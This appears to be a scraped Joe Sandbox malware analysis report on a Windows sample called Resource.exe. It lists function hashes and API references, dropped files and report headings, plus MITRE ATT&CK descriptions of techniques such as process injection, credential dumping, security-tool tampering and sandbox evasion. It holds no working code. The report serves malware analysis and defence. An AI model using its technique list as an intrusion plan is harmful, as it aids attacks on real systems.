Instruction ID: a45cd4e374da4e5826d3733db6859d59e99c91c136ede80da92014b523b1026d
Opcode Fuzzy Hash: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
Instruction Fuzzy Hash: 11E10121A08E8281FB658A3094547BE2791EF41FA8F044135DE4DCB7D6DF2EE445E79C

Function 00007FF6185C72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6185F915C: new.LIBCMT ref: 00007FF6185F91CA
Part of subcall function 00007FF6185F915C: new.LIBCMT ref: 00007FF6185F91F2

new.LIBCMT ref: 00007FF6185C73DE

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe86b29481cf32e220eeea16457890f25d1a333407dcb7e8bf6cf3eea50450d3
Instruction ID: 9e44ef34ee554a3918a18151488a528cd6ec4a0f788bdb8ce907ed24b7f01791
Opcode Fuzzy Hash: fe86b29481cf32e220eeea16457890f25d1a333407dcb7e8bf6cf3eea50450d3
Instruction Fuzzy Hash: C4512473528BD195E7019F34A8441ED37A8FB44F98F58423AEF884BB9ADF389061C725

Function 00007FF61862231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF618622344

Part of subcall function 00007FF6186224D4: GetModuleHandleExW.KERNEL32 ref: 00007FF6186224F4
Part of subcall function 00007FF6186224D4: GetProcAddress.KERNEL32 ref: 00007FF61862250A
Part of subcall function 00007FF6186224D4: FreeLibrary.KERNEL32 ref: 00007FF61862252F

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 471960e76e121ee75e96106c88057c57424c798eb699dfbb5e9faf0247770959
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 21419D21A09E8382FB68DB35E85027973A2AF90FA0F505475D90DC77A1DE3CE845A3C9

Function 00007FF6185D4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF6185D4D47

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: 5dbecc334fd14a9744734c73d16766462bcbfcf0cde72bf99bd5cdbb987c199e
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: C901961160CE4285EB90F736A4801FE5A60FF85FA4F580571EE8D8736ADE3DD4418748

Function 00007FF618624B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: d21e84c1ea1d53fa05af1ab1ebdf78c8f646f252b1a31c368dec7e94e572eb73
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 75017C50A0DE8340FB64A6769AC037931B35F94FF4F0882B0ED1DC62D6EE2CE401628D

Function 00007FF618624AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF618624AF2

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: 4836fc4f5570aa18946f2e6a404e33aaba31046bb9615a64282a9891c604dd7d
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 9EF08221B1DA8341FF546AB159C027532A24F84FB0F090AF0ED2EC53C6EE5DE840639C

Function 00007FF61862FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF61862FA20

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: ad16ade03feb5ce451c4dbb137ba04c349214bed1f24d93931f051ac2239db57
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: 10D05E65E1ADC2C6F704CB61F84433022617F54FB9F610635C41CC4550CFADA148A388

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Resource.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ? ? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RESB5E2.tmp

C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd

C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd

C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd

C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd

Windows Analysis Report
Resource.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre